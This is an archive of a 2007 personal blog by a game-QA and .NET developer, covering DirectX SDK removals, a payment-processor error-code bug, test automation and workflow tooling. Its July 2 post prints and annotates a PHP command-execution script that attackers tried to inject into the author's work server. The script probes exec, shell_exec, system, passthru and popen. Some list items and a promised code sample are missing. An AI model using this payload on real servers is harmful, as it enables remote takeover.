July 31, 2007

Since Technorati shows no sign of finding a way to get rid of the unwanted spam links (I'm in the top 5,000 now with an authority of 610), I figure I may as well try to use my increased rank to try to help out some other sites...steal traffic from the spammers and give to those who need it. Some I've linked to before, others not at all.

Quality Assurance

Game QA Blog - Just over a year old, Zachary's writing seems to be following the same path that mine did for the longest time. Starts out rather idealistic in many ways, and then realism sets in and the important thing becomes figuring out which ideals to stick to and which ones you can trade to get the work done.

Climactic Avenue - Sam Kalman started out doing certification testing, then went to doing contract testing for business software, and is now working on Unity.

DevelopmentAIGameDev.com - Great feed that's been going over theory, some nuts and bolts plumbing and optimization tips on game AI. Very C++ focused, but many of the template tips and tricks work just as well with VB.NET and C#.

Coding Horror - I may not always agree with Jeff Atwood, but I agree with him more often than not.

Worse than Failure - Formerly "The Daily WTF," this blog is a daily must-read for any developer. If you see something and don't understand why it's a WTF, you've just learned about a hole in your skillset.

MSDN Magazine - I'm still amazed at how many people don't know this, but MSDN puts all of their magazine's content and code up on the site at the same time as the issue ships. You can read the entire issue online...without ads.

GameDev.net/DevMaster.net - The basic information that you are needing to solve just about any game development problem can be found on one of these two sites.

The Z-Buffer - A great starting point for finding XNA and Managed DirectX information. Andy, you need to find more things to update about.

Annals of Oracle's Improbable Errors - Working with Oracle is a nightmare. Working with Oracle via .NET can be even worse. For someone with a SQL Server background, a site like this is a godsend. While lately it has been a bit focused on Oracle application server issues, any major Oracle issue you have probably has an entry here.

AddressOf.com - Cory's VB/.NET focused blog. Like me, he gets very angry when a first-class language gets relegated to the position of red-headed stepchild.

4) XACT session windows. I know a couple of audio designers who are currently spooging over this. I can't speak for it one way or another, but they're loving the idea of it. They'll let me know if it's a major improvement.

6) Removals. This is the biggie because this is the last version that will have any of the below. Let's go over the removals one by one.

a) Direct3D 8 and below and DX8-era HRESULT conversion routines. I'm glad for this. DirectX 9.0 is a mature API, and while backwards compatibility will remain part of the operating system, it's time for coders to move on.

c) DirectAnimation. This was essentially "DirectX talks to web pages." With support gone in IE7, it's a good removal.

d) DirectMusic. I knew it was coming, but it's still sad to see DirectMusic go. There were a few great usage scenarios for DirectMusic that still aren't directly covered by XACT, DirectSound or XAudio2, but it's a good API that has run its course.

e) DirectInput 7 and below. Microsoft's guidance for the last eighteen months has been to use a combination of XInput and Windows messages instead of DirectInput, and to be honest, while the code may be slightly more complex, it's a bit more stable that way.

f) DirectPlay. While I'd like to see some supported network sample code for WinSock and XSockets (the Games for Windows - LIVE version of WinSock), DirectPlay really ran its course years ago. The last production game that I'm aware of that used DirectPlay was "Microsoft Golf 2001 Edition." (Yes, "Links LS 1998" up through "Microsoft Golf 2001 Edition" used DirectPlay for networking.)

g) DirectPlayVoice. Useless without DirectPlay, so a good cut.

h) Managed DirectX samples and documentation. This is the only cut that pisses me off. I know that XNA is supposed to supplant Managed DirectX, but you'd think they could have at least waited until they had a version of XNA Game Studio that would integrate with all Visual Studio SKU's before killing MDX. Of course, since there were deprecated assemblies for DirectMusic, DirectInput and DirectPlay, I guess it was inevitable given the above.

July 28, 2007

I woke up feeling pretty good about myself. The new server was supposed to go live the evening before, and it had passed all of its production tests prior to my going to bed. Before going to bed, I'd even set my BlackBerry on loud so that if anything did go wrong, it would wake either myself, my wife or my granddaughter up so it could be taken care of. The red blinking light and the vibrating BlackBerry told me that there seemed to be a difference of opinion between me and RIM about what "loud" meant.

"Half of our credit card transactions are getting denied and we don't know why." Needless to say, that made me panic a bit. That portion of the server had been tested non-stop for nearly a month. It was the first part of the server to get completed, so it not working really threw me for a loop.

I VPN'ed into the server and looked at the audit logs. Sure enough, there was some goofy error code there that I had never seen before. I logged into our credit card processor's site and saw that the code was an Address Verification System failure. I went back to my code and saw that I had a check in for AVS failures that had passed unit tests against their test system, but it was a different error code.

Now, these people's cards would have been denied anyway, but they were getting the incorrect message. I was abstracting the processor code behind an enum of my own, so instead of code 101, they'd be getting CreditCardResult.DeniedMissingInfo and instead of code 204, they'd be getting back CreditCardResult.DeniedOverLimit. Any code that I didn't recognize that was a failure would come back as CreditCardResult.DeniedOther. The number of things that could result in DeniedOther were fairly small, but because the code I was getting back differed between test and production, AVS failures were returning DeniedOther instead of DeniedAVS.

Others were showing different errors. The bad card number error code was being used for missing card information, and other things weren't matching up either.

I spent a few minutes looking to see which code were being returned for which values and I was rather disturbed by the change. Did our tests pass because we were using values under $25? How did our test environment differ from our production environment?

After digging a bit deeper, I found the reason. Our test environment on the processor server side had been using GPN on the back end instead of Global Collect. For them, AVS errors were code 203 instead of code 200. All of the failure codes varied slightly as a result.

A quick bit of code to detect if we were in production or test and a quick mapping table for the correct codes to the proper environment, and all would be good again once the next production build was pushed live.

July 27, 2007

Nothing is more depressing in software development than hitting all your deadlines and then having your product stopped in its tracks due to an external dependency.

Twenty minutes ago, I should have thrown the switch on the new multicurrency system, but due to a hitch with an external partner, I'm stuck here twiddling my thumbs, waiting for the them to finish dotting their "I"'s and crossing their "T"'s.

Blech.

Of course, the coming 96 hours are going to be fun in and of themselves. I'm the support back home for a conference that's going on in a different country, which means that the vast majority of my last week with my granddaughter is going to be spent stuck at home next to a laptop VPN'ed into our network.

Take a break. Visit the Shack. Check E-mail; feel bad that there are over 300 unread messages. Check the automated error E-mails. Wonder why the wife called you and complained that her keyboard's "N" key broke.

July 23, 2007

For the past year, I've been trying to keep close tabs on my bandwidth usage so that I can properly cost out what it would cost to switch over to a colocated server.

I put 99% of my images on a subdomain to improve loading times on the site as well as to seperate out the bandwidth for tracking purposes.

Right now, I serve between 800Mb and 1.2Gb a month of HTML, and between 2Gb and 6Gb of all non-HTML files per month.

Now that I've got my stats fairly locked down, I need to start doing some heavy-duty bandwidth estimations on some of the other items that I'm planning on offering. I also need to start pricing out 1U servers.

July 20, 2007

Now I know why PC Gamer UK hasn't published my column online yet. They decided to publish it in PC Gamer US. Would have been nice to know ahead of time so I could properly pimp it.

Anyway, if you can find a copy on shelves, it's Issue #165 (September 2007, Space Siege) on page 16.

The only thing I will say...PC Gamer US rephrased the opening paragraph to eliminate the phrase "chaingun rape." Funny thing to eliminate...I thought it set the tone for what we were going through at the time.

I think the artist did a good job of bringing the attitudes of the characters from Shultz's original work, and I think it's a testament to Shultz that he was able to imbue his characters with so much personality with only three panels a day.

July 18, 2007

I E-mailed Technorati after I noticed that spammers were using links to my blog to try to mask themselves. I'm sure it's the first time in history that they've ever gotten an E-mail complaining that their blog was rated too high.

Obviously, they still haven't figured out how to filter spam links to me.

I'm a fan of test automation. I keep up on all of the latest and greatest automated testing tips and techniques from people like The Braidy Tester. I try to tie as much automated testing as possible into the applications that I write on a regular basis. When it comes to application testing, you won't find many supporters as die-hard as I am. However, I do recognize that test automation has its limits. In games testing, automation testing is for the most part only useful for verification purposes.

What does that mean? It means that you can use automated testing tools in games to verify that content is formatted as described and to a lesser extent verify that the content is "well formed," but unless your regular testers find a repeatable type of content failure and are able to train a tool to identify that particular type of content failure, you won't be able to find what is wrong with your content.

You can use automated tools to automate game UI testing and level load testing, but very little can be done to automate gameplay testing for 99% of the games on the market. You can use automated QA to generate the massive amounts of combinations for combination testing, but you still need a human to evaluate the results in most cases.

You can automate harnesses against backend servers to ensure that the proper errors are thrown and that the proper data is passed back and forth, but you still need to be testing the game itself against the server caused by humans.

While most applications can gain a real benefit from test automation and can even reduce their test headcount needs via automation, video game testing is almost the last place where flesh and blood cannot be replaced effectively at this time.

July 17, 2007

I'm in the fortunate position to have never been on the contract testing side of things, but I've had contractors working for me both at Microsoft and at Ritual.

While the article may be a partially accurate picture of how contract testing is done off-site (or on-site with Sony), contract testing on-site used to be markedly different. Note, I said "used to be."

Inside Microsoft's Redmond campuses, space is always at a premium. Offices that used to only hold a single person get doubled or tripled up nowadays...and that's for the FTE's. Cramped space doesn't make it any easier to get your work done.

In addition, Microsoft has been shifting their staffing allocations for testing. Back with "Halo 2" for Xbox, there were three test leads, three SDET's, three Bungie FTE testers and five Microsoft FTE testers for a total of fourteen testers. There were also eighteen contract testers on the game...almost but not quite a one-to-one ratio of FTE's to contract testers. Thirty-two credited testers...not bad.

Compare that to "Halo 2" for Vista. Two test leads, seven FTE testers and two credited contractors. They must not have thought it would be very hard to test...after all, it's a port. Of course, then there's the shared Tools & Technology group that is split between every single MGS release, but since they're a shared team, you really can't count them towards test.

So at this point, we have eleven credited testers, or about 33% of the number of testers that "Halo 2" Xbox had. What do you get for that? The poor performance is only the start of the issues with "Halo 2" for Windows Vista. Hell, they didn't even spell "Windows" right in the manual. (See page 31.)

Between trying to spend some quality time with my granddaughter, trying to debug a showstopping issue with the USEMP Alpha (some new code is keeping German from working like it was), and panicking because my glucose test strips started giving me readings that were between 40-70 points high (they're coding wrong), I've had very little time to do much of anything.

The batch of e-Commerce functionality that had to be done for conference is done and now just needs to be tested and bugfixed. On functionality for post-conference, I have four admin-facing pages that need to be polished off where the pages are 99% done and I'm just waiting on stored procedures from my DBA. I've also got about 14 bugs that are not finance related that I need to track down and squash by Tuesday end-of-day.

July 12, 2007

Last night, I hit the code complete milestone on the new finance system at work about eighteen hours ahead of schedule. (Code complete means that all features are functioning and working together.)

Now that the system has hit the code complete milestone, it can start being tested at a deeper level by other people and I can start working on making the system look good because right now the finance system looks like an atrocious mishmash of programmer art and ugly dev HTML.

What has changed since the project was started?

We started out using Windows Workflow Foundation to handle our prolonged workflows, but a few things caused us to jettison WF. WF works great in the following two situations:

1. All workflows will complete while the executing process is running.2. You will never update the workflow DLL.

If you are working with situation #1, WF works wonderfully. It's able to effectively load balance your workflows in such a way that you can have several client tasks going on at once with no real problem. If you are working with situation #2, WF works great as well because with the persistence services, you're set.

However, if you ever have to update your workflow DLL and you are persisting your workflows between launches, you are screwed. Because WF uses binary serialization to persist your workflows, if the version number for your DLL changes or if you digitally sign your WF DLL or if the footprint for your workflow changes, you lose ownership of the workflow on next launch and can't retrieve it even if you create a manifest file that says it's okay to use the new version. That's fine if your workflows are small cheap tasks, but if your workflow takes several months to execute because of needed human interaction, losing that workflow and all of the data associated with it can be fatal to your project and your career. Even if you restore the old version of the DLL to try to get those workflows back, you're still screwed...they're gone. I wish they had tried to use some of the work that the WCF team had done to make it a bit more robust against change, but I guess you can't have everything.

The really sad thing is that the code got significantly simpler after giving WF the boot.

If you're using .NET and want to use the service, note that it does return an XML document back as a string. You'll most likely want to use XPath to pull out the appropriate values.

If .NET supported XPath 2.0, it would be pretty simple. You could just use an XPath query like this to get the amount that you'd have to mulitply your U.S. dollar amount by to get the value in the foreign currency:

Third, I've grown to really dislike the SqlDataSource control for one reason and one reason only: When you select your connection string from the dropdown, rather than show the name of the connection string, it shows the connection string so you have no idea if the proper connection string is in use unless you memorize the actual connection string.

I've got multiple connection strings in place depending on which server I'm going to be talking to and what the purpose of the communication is. I'd rather see the name of my connection string, like "Oracle.ReadOnly" or "Sql.Finance.ReadWrite" instead of the actual connection string.

I'll try to do a more thorough post-mortem once it's all over. In the meantime, I need to go get some food. I'm on day six without any glipizide and while my morning readings have been a little high, my after-meal readings have been in the 140-160 range and that's all that I can ask.

July 11, 2007

I got an E-mail this morning from a former co-worker at Access Software and Microsoft Game Studios who is now working for Terminal Reality here in the Dallas area. Turns out some of the people there read my blog and were wondering if he knew me, but he wasn't immediately able to associate "Michael Russell" with me. I don't blame him, but I should explain. I've already told this story a couple of times here, but it bears repeating.

Back at Microsoft Game Studios in Salt Lake City, we had Michael's and Russell's coming out of every orifice. First names, last names, they all ended up getting muddled, so my name got confused on a regular basis.

One day, I was called up to Dave Curtin's office and he started ripping into me for some items and I honestly had no idea what he was talking about. I told him so and he started going into some more detail and I realized that he wasn't talking about me, he was talking about Michael Burge. He seemed shocked that he was ripping into the wrong Michael, but he then transitioned over to some other negative items that he had heard about. Again, I didn't understand what he was talking about, but after listening for a few more minutes, I realized that he was talking about Russell Jenkins. Another rant followed, but then it became clear he was talking about Russell Hunter.

At that point, I figured I better come up with some way to differentiate myself in his eyes. Now back then, every day at lunchtime was either "Age of Empires II" or "Rainbow Six," and my character name was always "Rom." Likewise, everyone else who participated on a regular basis went by their alias: Ron was Drogo, Russ was Jinx, Sandeep was El Toro, Chris was Wedgemaster, Seth was Madhatterguy, Kevin H. was Remoh, Kevin C. was Banzai, Mike B. couldn't settle on just one and so on. Our aliases were interchangable with our names during regular conversations around the office.

I told Dave that since he was confusing me with other people, and since everyone in my department already called me Rom, he should just call me Rom. A lightbulb went off in his head as I think he had heard other people talking about Rom and just not put two and two together.

The practical upshot of this was that I was instantly memorable and was no longer being confused with other people. The downside, though, is that people have to mentally shift gears to remember me by my real name. I've had people who do reference checks tell me that they would ask about me by name and the person on the other end would go, "Michael....OH! You mean Rom...yeah, he..."

So over the last few years, I've made a conscious effort to keep my real name at the forefront and use my alias only as a backup and it did make a difference. In a little under two years after returning to the industry, I'm now recognized by name when I talk with other game developers which is almost unheard of for someone in QA.

Eventually, RomSteady may be as well-known as a moniker as CliffyB, but for now, I'm happy having my name be known. It may take some time to remerge my past with my name, but I'm building a history I can be proud of.

Remember, you may have a bug-free game engine, but bugs in your data will frustrate your users worse than a crash many times. Especially for games, the rule of thumb is that you generally spend over two thirds of your time testing the data.

I'm still evaluating it so I can't tell you how good (or bad) it is. I can say that it is one of the more complex managed-code engines under the hood, but with good reason. Making an engine is hard. Making a crossplatform engine is harder. Making a crossplatform engine where runtime allocations can kill your performance on one of the platforms definitely sucks.

If you've used Torque X at all and want to share your feedback, this is the place to do it.

July 2, 2007

I've been looking over some of these "hack scripts" that people keep trying to inject into our site, and I'm surprised how...um...efficient some of them can be. Take the one from my last post (stringa.txt) and I'll try to annotate it. Given that I don't know PHP, please correct me if I'm wrong.

Get the current working directory.echo "Mic22"; Print something out to see if the call was allowed.$OS = @PHP_OS; Tell me what OS is running so I can pass on OS-specific bad calls.echo "OSTYPE:$OS";$free = disk_free_space($dir); How much free space is there that I can hijack?if ($free === FALSE) {$free = 0;}if ($free < 0) {$free = 0;} echo "Free:".view_size($free)."";$cmd="id"; Pull a command from the query string so that I can really own this server...$eseguicmd=ex($cmd); Own the serverecho $eseguicmd; Reiterate that I owned the server.

function ex($cfe){$res = ''; This is where the result from me owning the server will go.if (!empty($cfe)){ If a command was sent via the query string...if(function_exists('exec')){@exec($cfe,$res); Run the command if "exec" is available to me$res = join("\n",$res);}elseif(function_exists('shell_exec')){ If "exec" isn't available, look for shell_exec$res = @shell_exec($cfe);}elseif(function_exists('system')){ Look for the system command@ob_start(); Create an output buffer to store the results of the command I'm going to run@system($cfe);$res = @ob_get_contents(); Get and return the results of the command I just ran@ob_end_clean();}elseif(function_exists('passthru')){ Look for a different security hole...@ob_start();@passthru($cfe);$res = @ob_get_contents();@ob_end_clean();}elseif(@is_resource($f = @popen($cfe,"r"))){ Screw it, just try opening a file on the machine so I can find another hole.$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;}

You've got to love some of the hacks that people try to do on the net. I've actually been amazed by the sheer quantity of hacks against our servers at work. Fortunately, the vast majority of them have been from idiots.

I spent a large part of today reinstalling Windows XP on my laptop (it just didn't have enough oomph for Vista), and the quantity of updates really shocked me.

I started out with Windows XP Professional with Service Pack 2 slipstreamed. Immediately after installing, I had 89 updates. It took an hour to get and install them, but it was a relatively painless process that installed WMP 11 and IE7 in addition to several patches.

After rebooting, I reran Windows Update and there were a further 11 updates to the updates. Again, relatively quick and painless, but a bit confusing.

After rebooting again, I reran Windows Update and there was 1 update to the updates to the updates.

Grand total: 101 updates. It may not be time for SP3, but it could be considered time for a SP2 Update Rollup.

About Me

Currently Sr. Software Engineer in Test at Netflix. Formerly Sr. Quality Engineer on Firefly at Amazon, QA Manager at Ritual Entertainment, Software Test Lead at Microsoft Game Studios, Director of IT for Meeting Professionals International.

Opinions expressed are my own and do not necessarily represent those of any current, former, or future employer.